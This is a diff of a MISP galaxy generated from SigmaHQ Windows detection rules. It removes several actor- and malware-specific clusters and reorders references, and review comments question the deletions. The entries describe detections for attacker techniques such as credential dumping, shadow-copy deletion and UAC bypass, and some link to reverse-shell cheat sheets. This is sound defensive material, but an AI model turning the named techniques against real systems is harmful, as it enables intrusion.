- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00",
- "value": "Mustang Panda Dropper"
- },
- {
- "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/09",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_griffon_patterns.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_griffon_patterns.yml"
- ],
- "tags": [
- "attack.execution"
- ]
- },
- "uuid": "bcc6f179-11cd-4111-a9a6-0fab68515cf7",
- "value": "Griffon Malware Attack Pattern"
- },
{
"description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe",
"meta": {
@@ -47248,8 +46534,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/3proxy/3proxy",
"https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://github.com/3proxy/3proxy",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml"
],
"tags": [
@@ -47282,10 +46568,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ReaQta/status/1222548288731217921",
- "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
"https://www.activecyber.us/activelabs/windows-uac-bypass",
+ "https://twitter.com/ReaQta/status/1222548288731217921",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"
],
"tags": [
@@ -47319,9 +46605,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.python.org/3/using/cmdline.html#cmdoption-c",
- "https://www.revshells.com/",
"https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://www.revshells.com/",
+ "https://docs.python.org/3/using/cmdline.html#cmdoption-c",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml"
],
"tags": [
@@ -47354,8 +46640,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
+ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml"
],
"tags": [
@@ -47480,8 +46766,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://nsudo.m2team.org/en-us/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml"
],
"tags": [
@@ -47551,50 +46837,6 @@
"uuid": "903076ff-f442-475a-b667-4f246bcc203b",
"value": "Nltest.EXE Execution"
},
- {
- "description": "Detects a ZxShell start by the called and well-known function name",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2017/07/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_zxshell.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003",
- "attack.defense_evasion",
- "attack.t1218.011",
- "attack.s0412",
- "attack.g0001"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc",
- "value": "ZxShell Malware"
- },
{
"description": "Shadow Copies deletion using operating systems utilities",
"meta": {
@@ -47611,11 +46853,11 @@
"refs": [
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
"https://github.com/Neo23x0/Raccine#the-process",
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
"https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
"https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
"https://blog.talosintelligence.com/2017/05/wannacry.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"
@@ -47727,11 +46969,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://man.openbsd.org/ssh_config#ProxyCommand",
- "https://man.openbsd.org/ssh_config#LocalCommand",
- "https://lolbas-project.github.io/lolbas/Binaries/Ssh/",
- "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files",
"https://gtfobins.github.io/gtfobins/ssh/",
+ "https://man.openbsd.org/ssh_config#LocalCommand",
+ "https://man.openbsd.org/ssh_config#ProxyCommand",
+ "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files",
+ "https://lolbas-project.github.io/lolbas/Binaries/Ssh/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"
],
"tags": [
@@ -47751,52 +46993,6 @@
"uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598",
"value": "Lolbin Ssh.exe Use As Proxy"
},
- {
- "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/04/13",
- "falsepositive": [
- "Unknown",
- "Some cases in which the service spawned a werfault.exe process"
- ],
- "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html",
- "https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/",
- "https://twitter.com/cyb3rops/status/1514217991034097664",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16",
- "value": "Potential CVE-2022-26809 Exploitation Attempt"
- },
{
"description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy",
"meta": {
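Review bot: deleting this cluster drops uuid a7cd7306-df8b-4398-b711-6f3e4935cf16 together with its two `related` ATT&CK links, so any MISP event or tag that references "Potential CVE-2022-26809 Exploitation Attempt" by uuid stops resolving. Nothing in the hunk says whether the upstream rule was retired or just moved out of the directory the generator scans (the `refs` entry still points at `rules/windows/process_creation/`); either keep the entry and mark it deprecated in the description, or state in the commit message why the uuid is being removed.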
@@ -47952,9 +47148,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml"
],
"tags": [
@@ -47978,8 +47174,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://isc.sans.edu/diary/22264",
"https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"
],
@@ -48010,67 +47206,6 @@
"uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede",
"value": "File Download Via Bitsadmin"
},
- {
- "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2018/03/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_oilrig_mar18.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_oilrig_mar18.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06",
- "value": "OilRig APT Activity"
- },
{
"description": "Detects code execution via the Windows Update client (wuauclt)",
"meta": {
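Review bot: this removal takes out a `critical`-level cluster that carried four `related` entries and actor and software tags (`attack.g0049`, `attack.s0111`). Before merging, check that no other cluster in the repository lists ce6e34ca-966d-41c9-8d93-5b06c8b97a06 as a `dest-uuid`; otherwise the patch leaves dangling relations on the threat-actor side that nothing in this diff cleans up.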
@@ -48245,40 +47380,6 @@
"uuid": "883835a7-df45-43e4-bf1d-4268768afda4",
"value": "Regedit as Trusted Installer"
},
- {
- "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/04/07",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt10_cloud_hopper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.g0045",
- "attack.t1059.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "966e4016-627f-44f7-8341-f394905c361f",
- "value": "Potential APT10 Cloud Hopper Activity"
- },
{
"description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n",
"meta": {
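Review bot: the clusters removed in this patch all come from `proc_creation_win_apt_*`, `proc_creation_win_malware_*` and `proc_creation_win_exploit_cve_*` files, which looks like a change in what the generator's source path covers rather than a deliberate retirement of a dozen detections. If these rules still exist upstream under another directory, the generator should follow them and rewrite the SigmaHQ `refs` URL from the rule's actual location instead of dropping the clusters.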
@@ -48292,13 +47393,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
"https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
- "https://twitter.com/CyberRaiju/status/1251492025678983169",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32",
- "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
"https://www.cobaltstrike.com/help-opsec",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
+ "https://twitter.com/CyberRaiju/status/1251492025678983169",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml"
],
"tags": [
@@ -48331,10 +47432,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
"https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml"
],
@@ -48388,31 +47489,6 @@
"uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d",
"value": "Potential RDP Tunneling Via SSH"
},
- {
- "description": "Detects potential Muddywater APT activity",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_muddywater_activity.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_activity.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.g0069"
- ]
- },
- "uuid": "36222790-0d43-4fe8-86e4-674b27809543",
- "value": "Potential MuddyWater APT Activity"
- },
{
"description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.",
"meta": {
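Review bot: this cluster has `creation_date` 2023/03/10, the newest of all the rules removed in this patch, which makes a deprecation explanation unlikely and a scan-path regression more likely. Please confirm against upstream before merging; a rule created this recently should not disappear from the galaxy without a stated reason.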
@@ -48546,40 +47622,6 @@
"uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205",
"value": "Renamed Vmnat.exe Execution"
},
- {
- "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/11/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_trickbot_wermgr.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1559"
- ]
- },
- "related": [
- {
- "dest-uuid": "acd0ba37-7ba9-4cc5-ac61-796586cd856d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27",
- "value": "Trickbot Malware Activity"
- },
{
"description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples",
"meta": {
@@ -48593,8 +47635,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.localpotato.com/localpotato_html/LocalPotato.html",
"https://github.com/decoder-it/LocalPotato",
+ "https://www.localpotato.com/localpotato_html/LocalPotato.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml"
],
"tags": [
@@ -48619,8 +47661,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/sensepost/impersonate",
"https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/",
+ "https://github.com/sensepost/impersonate",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml"
],
"tags": [
@@ -48722,8 +47764,8 @@
"logsource.product": "windows",
"refs": [
"https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://www.scythe.io/library/threat-emulation-qakbot",
"https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/",
+ "https://www.scythe.io/library/threat-emulation-qakbot",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml"
],
"tags": [
@@ -48850,8 +47892,8 @@
"logsource.product": "windows",
"refs": [
"https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
- "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps",
"https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
+ "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml"
],
"tags": [
@@ -48941,9 +47983,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml"
],
"tags": [
@@ -48986,116 +48028,6 @@
"uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43",
"value": "Arbitrary Binary Execution Using GUP Utility"
},
- {
- "description": "Detects potential EmpireMonkey APT activity",
- "meta": {
- "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/04/02",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_empiremonkey.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider",
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "related": [
- {
- "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d",
- "value": "Potential EmpireMonkey Activity"
- },
- {
- "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/01/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_lolbin_rdrleakdiag.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rdrleakdiag.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036",
- "attack.t1003.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "6355a919-2e97-4285-a673-74645566340d",
- "value": "Process Memory Dumped Via RdrLeakDiag.EXE"
- },
- {
- "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/10/22",
- "falsepositive": [
- "Renamed SysInternals tool"
- ],
- "filename": "proc_creation_win_apt_ta17_293a_ps.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.us-cert.gov/ncas/alerts/TA17-293A",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.g0035",
- "attack.t1036.003",
- "car.2013-05-009"
- ]
- },
- "related": [
- {
- "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "18da1007-3f26-470f-875d-f77faf1cab31",
- "value": "Ps.exe Renamed SysInternals Tool"
- },
{
"description": "Detects a code page switch in command line or batch scripts to a rare language",
"meta": {
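Review bot: this hunk removes three unrelated clusters at once, and the middle one, "Process Memory Dumped Via RdrLeakDiag.EXE" (`proc_creation_win_lolbin_rdrleakdiag.yml`, tagged `attack.t1003.001`), is a generic LOLBIN credential-access rule, not an actor- or malware-specific one like the EmpireMonkey and TA17-293A entries around it. If the removal criterion is "threat-specific rules", this entry does not meet it and its deletion needs its own justification or should be reverted.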
@@ -49109,8 +48041,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cglyer/status/1183756892952248325",
"https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers",
+ "https://twitter.com/cglyer/status/1183756892952248325",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml"
],
"tags": [
@@ -49176,9 +48108,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
- "https://twitter.com/_st0pp3r_/status/1583914515996897281",
"https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
+ "https://twitter.com/_st0pp3r_/status/1583914515996897281",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml"
],
"tags": [
@@ -49344,58 +48276,6 @@
"uuid": "4f7a6757-ff79-46db-9687-66501a02d9ec",
"value": "Active Directory Structure Export Via Ldifde.EXE"
},
- {
- "description": "Detects potential Dridex acitvity via specific process patterns",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/01/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_dridex.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3",
- "https://redcanary.com/threat-detection-report/threats/dridex/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055",
- "attack.discovery",
- "attack.t1135",
- "attack.t1033"
- ]
- },
- "related": [
- {
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e",
- "value": "Potential Dridex Activity"
- },
{
"description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services",
"meta": {
@@ -49477,8 +48357,8 @@
"logsource.product": "windows",
"refs": [
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
- "https://github.com/samratashok/ADModule",
"https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml"
],
"tags": [
@@ -49537,9 +48417,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1583356502340870144",
"https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
"https://lolbas-project.github.io/lolbas/Binaries/Setres/",
+ "https://twitter.com/0gtweet/status/1583356502340870144",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"
],
@@ -49581,10 +48461,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43",
"https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
"https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat",
+ "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml"
],
"tags": [
